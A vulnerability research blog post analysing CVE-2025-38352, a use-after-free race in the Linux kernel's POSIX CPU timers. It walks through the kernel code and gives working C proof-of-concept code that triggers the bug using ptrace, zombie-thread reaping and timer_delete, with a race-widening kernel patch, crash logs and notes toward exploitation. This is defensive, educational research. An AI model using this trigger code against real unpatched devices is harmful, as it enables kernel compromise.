CVE-2025-38352 (Part 1) - In-the-wild Android Kernel Vulnerability Analysis + PoC

December 21, 2025

Part 1 (This blog post) - In-the-wild Android Kernel Vulnerability Analysis + PoC
Part 2 - Extending The Race Window Without a Kernel Patch
Part 3 - Uncovering Chronomaly

CVE-2025-38352 was a race condition use-after-free vulnerability in the Linux kernel's POSIX CPU timers implementation that was reported to have been under limited, targeted exploitation in the wild:

An analysis of this vulnerability was already posted by @streypaws. Their blog post does a good job explaining how POSIX CPU timers work, and the conditions under which this vulnerability can be triggered. You can find it here:

https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/

Since their blog post does not provide a proof of concept program that triggers the vulnerability, I decided to turn my Sunday night into a night of learning and write it myself.

This blog post provides a glimpse into how I approach analysing and writing PoCs for vulnerabilities. It also goes to showcase how invaluable such an approach is for learning new things.

The PoC
The Patch Commit
Testing Environment TL;DR
Vulnerability Recap
Planning Out The PoC
Writing the PoC
KASAN Splat
Non-KASAN Splat
Quick Note on CONFIG_POSIX_CPU_TIMERS_TASK_WORK
Exploitation
Conclusion
Final PoC

The PoC

In case you just want to see the PoC, you can find it here:

https://github.com/farazsth98/poc-CVE-2025-38352

The Patch Commit

The patch commit can be found here:

https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f90fff1e152dedf52b932240ebbd670d83330eca

Testing Environment TL;DR

Kernel Version

I used the LTS kernel version 6.12.33, as that was the latest LTS release that was still vulnerable to this bug.

CONFIG_POSIX_CPU_TIMERS_TASK_WORK

The patch commit mentions that the vulnerability cannot be triggered if CONFIG_POSIX_CPU_TIMERS_TASK_WORK is set.

The blog post by @streypaws mentions that they were unable to toggle off the CONFIG_POSIX_CPU_TIMERS_TASK_WORK flag. This is because by default, this is an internal flag defined in kernel/time/Kconfig(link)

config HAVE_POSIX_CPU_TIMERS_TASK_WORK
	bool

config POSIX_CPU_TIMERS_TASK_WORK
	bool
	default y if POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK

And HAVE_POSIX_CPU_TIMERS_TASK_WORK is set for both arch/x86/Kconfig and arch/arm64/Kconfig. Therefore, this vulnerability is actually only exploitable on 32-bit Android devices, which explains why it was described as being under limited, targeted exploitation in the wild.

In order to be able to toggle it off, make the following modification to POSIX_CPU_TIMERS_TASK_WORK in kernel/time/Kconfig:

config POSIX_CPU_TIMERS_TASK_WORK
	bool "CVE-2025-38352: POSIX_CPU_TIMERS_TASK_WORK toggle" if EXPERT
	depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
	default y
	help
	  For CVE-2025-38352 analysis.

Now, this flag will be toggle-able via make menuconfig.

For reference, I used the kernelCTF LTS config (link) as a base, and only made the above modification to be able to toggle off CONFIG_POSIX_CPU_TIMERS_TASK_WORK.

I also enabled full preemption via make menuconfig (search for PREEMPT in the menu), as the Android kernel has that turned on.

QEMU Setup

Since this is a race condition, it requires at least two CPUs to trigger. For my testing, I used a QEMU VM with 4 CPUs:

qemu-system-x86_64 \
    -enable-kvm \
    -cpu host \
    -smp cores=4 \
    # [ ... ]

Vulnerability Recap

I highly recommend reading the blog post by @streypaws (link) at this point before continuing. I will only add to the information in that blog post in order to explain how to trigger it.

Every time a per-CPU scheduler tick occurs, the kernel calls run_posix_cpu_timers() on each CPU. This function ends up calling handle_posix_cpu_timers() if a timer is ready to fire.

The vulnerability occurs specifically because handle_posix_cpu_timers() is allowed to run even if a task has become a zombie (that is, the task's tsk->exit_state is set to EXIT_ZOMBIE).

Let's take a quick look at handle_posix_cpu_timers() to understand the vulnerability:

static void handle_posix_cpu_timers(struct task_struct *tsk)
{
	struct k_itimer *timer, *next;
	unsigned long flags, start;
	LIST_HEAD(firing); // Faith: local list of timers

    // Faith: acquire tsk->sighand->siglock
	if (!lock_task_sighand(tsk, &flags))
		return;

	do {
		// [ 1 ]
        // Collect all firing timers into the `firing` list
		check_thread_timers(tsk, &firing);
		check_process_timers(tsk, &firing);

		// [ ... ]
	} while (!posix_cpu_timers_enable_work(tsk, start));

	// Faith: release tsk->sighang->siglock
	unlock_task_sighand(tsk, &flags);
    
    // Faith: RACE WINDOW START

	// [ 2 ]
    // Faith: Iterate over the `firing` list and fire the timers
	list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
		// [ ... ]
        // Faith: RACE WINDOW ENDs after the timer is finished being
        //        accessed.
	}
}

Referring to my own comments in the code above, and assuming there is only one firing timer:

After acquiring the tsk->sighand->siglock, it collects the firing timer and stores it in the local firing list. Notably, it removes the timer from the task at this point.
After the timer is collected, tsk->sighand->siglock is dropped, and the function then iterates over the local firing list and fires the timer.

Now, if the task is a zombie task, then after the tsk->sighand->siglock is dropped, a race window opens up. Inside this race window, another process can do the following to free the timer that's in the firing list:

Reap the zombie task - This can be done by a parent process using waitpid().
Call the timer_delete() syscall - This will call posix_cpu_timer_del() and free the timer via RCU.

When the parent process reaps the zombie task, release_task() will be called on it, which will end up setting the tsk->sighand to NULL via __exit_signal():

static void __exit_signal(struct task_struct *tsk)
{
	// [ ... ]

	sighand = rcu_dereference_check(tsk->sighand,
					lockdep_tasklist_lock_is_held());
	spin_lock(&sighand->siglock);

    // [ ... ]

	tsk->sighand = NULL; // Faith: HERE
	spin_unlock(&sighand->siglock);

	// [ ... ]
}

Then, when timer_delete() is used to call posix_cpu_timer_del(), it will notice that tsk->sighand is NULL, and just return 0:

static int posix_cpu_timer_del(struct k_itimer *timer)
{
	// [ ... ]
	int ret = 0;

	// [ ... ]
	sighand = lock_task_sighand(p, &flags);
	if (unlikely(sighand == NULL)) {
		WARN_ON_ONCE(ctmr->head || timerqueue_node_queued(&ctmr->node));
	} else {
		// [ ... ]
	}

out:
    // [ ... ]
	return ret;
}

When posix_cpu_timer_del() returns 0, it will return back to the timer_delete() syscall handler, which will call posix_timer_unhash_and_free() and free the timer:

SYSCALL_DEFINE1(timer_delete, timer_t, timer_id)
{
	// [ ... ]
retry_delete:
    // [ ... ]
    // Faith: timer_delete_hook() calls posix_cpu_timer_del()
	if (unlikely(timer_delete_hook(timer) == TIMER_RETRY)) {
		/* Unlocks and relocks the timer if it still exists */
		timer = timer_wait_running(timer, &flags);
		goto retry_delete;
	}

    // [ ... ]
	posix_timer_unhash_and_free(timer);
	return 0;
}

The actual freeing is done via RCU, so it does not happen immediately:

static void posix_timer_unhash_and_free(struct k_itimer *tmr)
{
	// [ ... ]
	posix_timer_free(tmr);
}

static void posix_timer_free(struct k_itimer *tmr)
{
	// [ ... ]
	call_rcu(&tmr->rcu, k_itimer_rcu_free);
}

Assuming all of this occurs in the race window described above - when handle_posix_cpu_timers() iterates over the local firing list and accesses the timer, it will lead to a UAF:

static void handle_posix_cpu_timers(struct task_struct *tsk)
{
	// [ ... ]
    // Faith: Iterate over the `firing` list and fire the timers
	list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
		// [ ... ]
        // Faith: UAF occurs here
	}
}

Planning Out The PoC

Now that we know what to do to trigger the vulnerability, let's plan out a proof of concept step-by-step.

Minimal POSIX CPU Timer PoC

The first thing we want to do is be able to call into handle_posix_cpu_timers(). The following minimal PoC achieves that:

#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

void timer_fire(void) {
    printf("Timer fired\n");
}

int main(void) {
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_THREAD;
    sev.sigev_notify_function = (void (*)(sigval_t))timer_fire;

    timer_t timer;
    int timerfd = timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer);
    printf("Timer created: %d\n", timerfd);

    struct itimerspec ts = {
        .it_interval = {0, 0},
        .it_value = {1, 0},
    };

    timer_settime(timer, 0, &ts, NULL);
    printf("Timer started: %d\n", timerfd);

    // Use up CPU time to fire the timer
    while (1);
}

timer_create() is used to create a POSIX CPU timer that calls timer_fire() when it's fired.
timer_settime() is used to make the timer fire after 1 second of CPU time is used up by the current thread.

Creating a Zombie Task

In order to understand how to transition a task into the EXIT_ZOMBIE exit state, let's take a look at exit_notify(), which is called via do_exit() when a thread / process has finished running and is exiting:

static void exit_notify(struct task_struct *tsk, int group_dead)
{
	// [ ... ]
	LIST_HEAD(dead);

	// [ ... ]

	tsk->exit_state = EXIT_ZOMBIE; // [ 1 ]
	
    // [ ... ]
    // [ 2 ]
	if (unlikely(tsk->ptrace)) {
		int sig = thread_group_leader(tsk) &&
				thread_group_empty(tsk) &&
				!ptrace_reparented(tsk) ?
			tsk->exit_signal : SIGCHLD;
		autoreap = do_notify_parent(tsk, sig);
	}

    // [ ... ]
    // [ 3 ]
	if (autoreap) {
		tsk->exit_state = EXIT_DEAD;
		list_add(&tsk->ptrace_entry, &dead);
	}

	// [ ... ]
    // [ 4 ]
	list_for_each_entry_safe(p, n, &dead, ptrace_entry) {
		list_del_init(&p->ptrace_entry);
		release_task(p);
	}
}

Referring to my annotations in the code above:

The task's exit state is initially automatically set to EXIT_ZOMBIE.
If the task is currently being ptraced, autoreap is set to the return value of do_notify_parent().
- do_notify_parent() will return false as long as the parent process is not ignoring SIGCHLD signals.
If autoreap is true, the task's exit state is set to EXIT_DEAD instead, and it is added to the local dead list.
The local dead list is iterated, and release_task() is called on each task on the list.

From our analysis in the previous section, we know that release_task() will set tsk->sighand to NULL.

Since we actually want handle_posix_cpu_timers() to be able to lock tsk->sighand->siglock and collect our firing timer in the local firing list, we do not want the task to be released here.

Therefore, in order to create a zombie task here, tsk->ptrace must be set, meaning that there must be a parent process ptracing this task. Additionally, the parent process must not be ignoring SIGCHLD signals.

Reaping a Zombie Task

In the context of threads and processes, "reaping" is the act of fully releasing and freeing a task (primarily the task structure allocated for it). The final reaping step is generally to get the kernel to call release_task() on the task.

A zombie task can be reaped by calling waitpid(zombie_task_pid, ...) in the parent ptracer process. The call stack we want is as follows:

do_wait() 
-> __do_wait() 
-> do_wait_pid()
-> wait_consider_task() 
-> wait_task_zombie()
-> release_task()

There is too much code to show in this call stack, so the following are the important conditions that we must meet to successfully reap the zombie task and call release_task() on it:

do_wait_pid() will only be called if we specify a PID (as opposed to a TGID, PGID, etc).
wait_task_zombie() will only be called if the following conditions are met:
- The zombie task is being ptraced.
- The zombie task is NOT the current thread group leader (by default, the thread group leader is the main thread of a process).

To meet the conditions above, the zombie task must be a non-main thread in a process that's being ptraced by a parent process.

Additionally, the parent process must specify the zombie task's thread ID (which is just a PID) to waitpid(), which means the child process has to communicate the thread ID to the parent process somehow.

Controlled Reaping of a Zombie Task

The following proof of concept demonstrates a parent process that has full control over when it reaps a non-main thread in a child process:

#define _GNU_SOURCE
#include <stdio.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <err.h>
#include <sys/prctl.h>
#include <sys/syscall.h>

#define SYSCHK(x) ({            \
    typeof(x) __res = (x);      \
    if (__res == (typeof(x))-1) \
      err(1, "SYSCHK(" #x ")"); \
    __res;                      \
})

void pin_on_cpu(int i) {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(i, &mask);
    sched_setaffinity(0, sizeof(mask), &mask);
}

pthread_t reapee_thread;
pthread_barrier_t barrier;
int c2p[2]; // child to parent
int p2c[2]; // parent to child

void reapee(void) {
    pin_on_cpu(2);
    prctl(PR_SET_NAME, "REAPEE");

    // Send this thread's TID to the parent process
    pid_t tid = (pid_t)syscall(SYS_gettid);
    SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));

    // Wait for the parent to attach
    pthread_barrier_wait(&barrier);

    return;
}

int main(int argc, char *argv[]) {
    // Parent and child setup
    // Use pipes to communicate between parent and child
    SYSCHK(pipe(c2p));
    SYSCHK(pipe(p2c));
    
    pid_t pid = SYSCHK(fork());
    
    if (pid) {
        // parent
        pin_on_cpu(1);
        char m;
        close(c2p[1]);
        close(p2c[0]);

        // Receive child process's REAPEE thread'sTID
        pid_t tid;
        SYSCHK(read(c2p[0], &tid, sizeof(pid_t)));
        printf("Parent: reapee thread ID: %d\n", tid);

        // Attach to the REAPEE thread and continue it
        printf("Parent: attaching to REAPEE thread\n");
        SYSCHK(ptrace(PTRACE_ATTACH, tid, NULL, NULL));
        SYSCHK(waitpid(tid, NULL, __WALL));
        SYSCHK(ptrace(PTRACE_CONT, tid, NULL, NULL));

        // Signal to child that we attached and continued
        SYSCHK(write(p2c[1], &m, 1));

        // Reap the REAPEE thread now
        printf("Parent: press enter to reap REAPEE thread\n");
        getchar();
        SYSCHK(waitpid(tid, NULL, __WALL));
        printf("Parent: detached from REAPEE\n");

        sleep(5);
    } else {
        // child
        pin_on_cpu(0);
        char m;
        close(c2p[0]);
        close(p2c[1]);

        prctl(PR_SET_NAME, "CHILD_MAIN");
        pthread_barrier_init(&barrier, NULL, 2);
        pthread_create(&reapee_thread, NULL, (void*)reapee, NULL);

        printf("Thread created\n");

        // Parent process writes to us when attached and continued, use
        // a barrier to continue the REAPEE thread now
        SYSCHK(read(p2c[0], &m, 1));
        pthread_barrier_wait(&barrier);

        pause();
    }
}

When running this PoC, attach GDB to the kernel after observing the following output:

Thread created
Parent: reapee thread ID: 152
Parent: attaching to REAPEE thread
Parent: press enter to reap REAPEE thread

In GDB, set a breakpoint at release_task() and continue. You can press enter at any point to trigger release_task():

gef> p p->comm
$1 = "REAPEE\000\000\000\000\000\000\000\000\000"

gef> bt
#0  release_task (p=p@entry=0xffff88800892d280) at kernel/exit.c:245
#1  0xffffffff811a549f in wait_task_zombie (p=0xffff88800892d280, wo=0xffffc90000627eb0) at kernel/exit.c:1254
#2  wait_consider_task (wo=wo@entry=0xffffc90000627eb0, ptrace=<optimized out>, ptrace@entry=0x1, p=0xffff88800892d280) at kernel/exit.c:1481
#3  0xffffffff811a6cd6 in do_wait_pid (wo=0xffffc90000627eb0) at kernel/exit.c:1629
#4  __do_wait (wo=wo@entry=0xffffc90000627eb0) at kernel/exit.c:1655
#5  0xffffffff811a6d86 in do_wait (wo=wo@entry=0xffffc90000627eb0) at kernel/exit.c:1696

Note that release_task() can periodically be called to reap kworker threads. In that case, you can just ignore it and continue.

Writing the PoC

Now, let's finally write the PoC!

Kernel Patch To Extend The Race Window

In order to help trigger the bug, I added a 500ms delay inside handle_posix_cpu_timers() to extend the race window. It makes the PoC much more reliable:

static void handle_posix_cpu_timers(struct task_struct *tsk)
{
    // [ ... ]
    unlock_task_sighand(tsk, &flags);

	// Faith: extend the race window
	if (strcmp(tsk->comm, "SLOWME") == 0) {
		printk("Faith: Did we win? tsk->exit_state: %d\n", tsk->exit_state);
		mdelay(500);
	}

    // [ ... ]
}

~~Note that this patch is not necessary to trigger the vulnerability~~ As it turns out, the patch is almost necessary to trigger the vulnerability. I've seen it triggered once or twice, but it's incredibly rare because of two reasons:

The race window is ~3000-4000ns by default with one timer (which is what my PoC below uses), so hitting the reap + free in that window is very difficult.
The timer free is handled by RCU, which is very likely going to take longer than 4000ns.

I think I got lucky a few times where some weird behavior caused the race window to linger around long enough for both conditions above to be met, but yeah it's not very reliable.

Check out Part 2 of this blog post to see how I created a PoC that doesn't require the above delay patch!

Triggering the race condition

In order to trigger the race condition, we have to combine our two PoCs from the previous section together, and ensure that the POSIX CPU timer is set up such that it fires after exit_notify() transitions the tsk->exit_state to EXIT_ZOMBIE.

Effectively, this means that when the non-main thread in the child process exits, there must be just enough CPU time left for the kernel's do_exit() function to call exit_notify() and transition the task to a zombie task before the timer fires.

However, we cannot have too much CPU time left! Otherwise, do_exit() will finish executing and using up all the CPU time it needs, so the timer will end up never firing if it needs to use up even more CPU time after this point.

Through some trial and error, in my local environment, a value of 250,000 nanoseconds worth of CPU time ended up working well.

Now, let's walk through the important parts of the final PoC step-by-step (full PoC is shown at the end).

Custom Wait Time Implementation

First, I specified a custom wait_time via argv[1] for easier testing. This is the CPU time that must be used up before the timer fires:

long int wait_time = 250000; // Works for me

int main(int argc, char *argv[]) {
    // Use a custom wait time to figure out the exact timing when the
    // timer will fire right after `exit_notify()` sets the task's
    // state to EXIT_ZOMBIE.
    if (argc > 1) {
        wait_time = strtol(argv[1], NULL, 10);
        printf("Custom wait time: %ld\n", wait_time);
    }

Setting Up The Timer

Now, in the reapee thread, create a POSIX CPU timer and set it to fire after the custom wait_time.

Ensure to also set the thread's name to SLOWME so that it is affected by the custom mdelay() patch we added to handle_posix_cpu_timers():

void reapee(void) {
    pin_on_cpu(2);
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_THREAD;
    sev.sigev_notify_function = (void (*)(sigval_t))timer_fire;
    char m;

    prctl(PR_SET_NAME, "SLOWME");

    // Send this thread's TID to the parent process
    pid_t tid = (pid_t)syscall(SYS_gettid);
    SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));

    printf("Creating timer\n");
    SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer));
    printf("Timer created\n");

    struct itimerspec ts = {
        .it_interval = {0, 0},
        .it_value = {0, wait_time}, // Custom wait time
    };

    // Wait for parent to attach
    pthread_barrier_wait(&barrier);

    SYSCHK(timer_settime(timer, 0, &ts, NULL));

    // Use some CPU time to make sure the timer will fire correctly
    for (int i = 0; i < 1000000; i++);

    return;
}

Reaping The Timer Thread And Deleting The Timer

Finally, inside the parent and child processes, we must do the following:

Parent process - Reap the REAPEE thread the same as before, and wait for the child to free the timer.
Child process - Wait for the parent process to reap the REAPEE thread, then use timer_delete() to delete the timer.

int main(int argc, char *argv[]) {
    // [ ... ]
    pid_t pid = SYSCHK(fork());
    
    if (pid) {
        // parent
        // [ ... ]

        // Signal to child that we attached and continued
        SYSCHK(write(p2c[1], &m, 1));

        // Reap the REAPEE thread now
        printf("Parent: reaping REAPEE thread\n");
        SYSCHK(waitpid(tid, NULL, __WALL));
        printf("Parent: detached from REAPEE\n");

        // Let the child process know REAPEE is reaped
        SYSCHK(write(p2c[1], &m, 1));

        // Let the child process delete and free the timer
        // before exiting
        SYSCHK(read(c2p[0], &m, 1));
    } else {
        // child
        // [ ... ]

        // Parent process writes to us when attached and continued, use
        // a barrier to continue the REAPEE thread now
        SYSCHK(read(p2c[0], &m, 1));
        pthread_barrier_wait(&barrier);

        // Parent process writes to us when waitpid() returns successfully.
        //
        // At this point, if we won the race, `handle_posix_cpu_timers()` will be in
        // the patched `mdelay(500)` with `tsk->exit_state != 0`, and calling
        // `timer_delete()` should make it see a NULL `sighand`, which will cause it to
        // just free the timer unconditionally.
        SYSCHK(read(p2c[0], &m, 1));
        timer_delete(timer);
        printf("Child: timer deleted\n");

        // Let the timer be freed by RCU, then let the parent process know it can exit
        wait_for_rcu();
        SYSCHK(write(c2p[1], &m, 1));
        pause();
    }
}

Testing The PoC

And that's it! The steps to run this PoC are as follows:

Compile using gcc -o poc -static poc.c
Run using while true; do /poc; done in the VM.

Note that the PoC does not hit the race condition 100% of the time, which is why I repeat it until it hits with the bash while loop.

You should modify the default wait_time to a value that works in your testing environment first.

Now, let's look at what the KASAN and non-KASAN splats look like 👀

KASAN Splat

With KASAN enabled, a UAF write can be observed:

[    9.995817] ==================================================================
[    9.999410] BUG: KASAN: slab-use-after-free in posix_timer_queue_signal+0x16a/0x1a0
[   10.003168] Write of size 4 at addr ffff88800e628188 by task SLOWME/179
[   10.006386]
[   10.007400] CPU: 2 UID: 0 PID: 179 Comm: SLOWME Not tainted 6.12.33 #7
[   10.007406] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[   10.007408] Call Trace:
[   10.007455]  <IRQ>
[   10.007468]  dump_stack_lvl+0x66/0x80
[   10.007487]  print_report+0xc1/0x610
[   10.007503]  ? posix_timer_queue_signal+0x16a/0x1a0
[   10.007506]  kasan_report+0xaf/0xe0
[   10.007509]  ? posix_timer_queue_signal+0x16a/0x1a0
[   10.007512]  posix_timer_queue_signal+0x16a/0x1a0
[   10.007515]  cpu_timer_fire+0x8d/0x190
[   10.007518]  run_posix_cpu_timers+0x807/0x1840

Non-KASAN Splat

With KASAN disabled, a WARN_ON_ONCE inside send_sigqueue() can be observed:

[   29.647984] ------------[ cut here ]------------
[   29.650267] WARNING: CPU: 2 PID: 205 at kernel/signal.c:1974 send_sigqueue+0x1be/0x250
[   29.653905] Modules linked in:
[   29.655484] CPU: 2 UID: 0 PID: 205 Comm: SLOWME Not tainted 6.12.33 #5
[   29.658569] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[   29.662579] RIP: 0010:send_sigqueue+0x1be/0x250
[   29.664712] Code: 44 89 e0 5b 5d 41 5c 41 5d 41 5e 41 5f e9 d5 e9 94 01 41 bc ff ff ff ff eb e2 48 8b 85 b0 07 00 00 48 8d 50 40 e9 2a ff ff ff <0f> 0b 45 31 e4 eb cb 0f 0b eb c7 4c 89 fe e8 bf 47 6a 01 48 8b bd
// [ ... ] Register states snipped out
[   29.703210] Call Trace:
[   29.704498]  <IRQ>
[   29.705663]  posix_timer_queue_signal+0x3f/0x50
[   29.707869]  cpu_timer_fire+0x23/0x70
[   29.709572]  run_posix_cpu_timers+0x2bc/0x5e0

Quick Note on `CONFIG_POSIX_CPU_TIMERS_TASK_WORK`

The blog post by @streypaws (link) mentions being able to hit this vulnerability even with CONFIG_POSIX_CPU_TIMERS_TASK_WORK enabled. However, I was not able to observe the same results.

In fact, after looking at what exit_task_work() does in do_exit(), it makes sense why the vulnerability cannot be triggered with CONFIG_POSIX_CPU_TIMERS_TASK_WORK enabled:

exit_task_work() calls task_work_run().
task_work_run() "poisons" the task->task_works structure, preventing any further work from being queued on it.

Since the vulnerability specifically requires exit_notify() to be called before handle_posix_cpu_timers(), and exit_task_work() (which calls handle_posix_cpu_timers() if it's enqueued) is called before exit_notify(), it is not possible to trigger this vulnerability with CONFIG_POSIX_CPU_TIMERS_TASK_WORK enabled.

Exploitation

I'm not sure if I will spend time writing an exploit for this vulnerability, but I did note the following:

POSIX CPU timers are allocated out of their own kmem_cache.
The struct k_itimer structure is not really that complex, so cross-cache is likely necessary.
For cross-cache, the race window inside handle_posix_cpu_timers() likely needs to be extended.
Extending the race window may be tricky given that handle_posix_cpu_timers() runs in the scheduler tick interrupt context, where IRQs are disabled.

My PoC already provides a UAF primitive, and obviously, if we go off of what the Android bulletin mentions, this vulnerability is definitely exploitable. It's just a matter of solving the exploit engineering problems above.

If I end up spending time on exploiting this vulnerability, I will write a new blog post as an update to this one! 😄

Conclusion

As I've mentioned in a previous blog post, my opinion is that analyzing and writing PoCs for complicated vulnerabilities is the best way to learn and conduct vulnerability research.

In this case, not only did I learn about POSIX CPU timers, but I learned how timers work in general, as well as how processes and threads are described via task structures in the Linux kernel.

If you have any questions, please let me know via Twitter or wherever else!

Final PoC

The final PoC is uploaded on my Github. You can view it here: